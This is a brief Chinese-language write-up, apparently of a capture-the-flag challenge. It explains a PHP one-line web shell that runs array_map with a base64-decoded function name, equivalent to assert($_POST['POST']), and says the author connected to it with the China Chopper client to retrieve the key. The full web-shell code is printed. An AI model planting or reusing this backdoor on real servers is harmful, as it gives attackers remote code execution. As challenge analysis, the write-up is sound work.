下载文件,又是一番探索木马文件
发现如下代码
<?php
error_reporting(0);
$e = $_REQUEST['e'];
$arr = array($_POST['POST'],);
array_map(base64_decode($e), $arr);
?>
这个也是一句木马的变种,获取url的e参数值(需要经过base64编码),链接密码是POST
array_map方法可以参考php手册:https://www.php.net/manual/zh/function.array-map.php
最终构成一句话木马
assert($_POST['POST']);
菜刀无惧链接,
链接成功,拿到key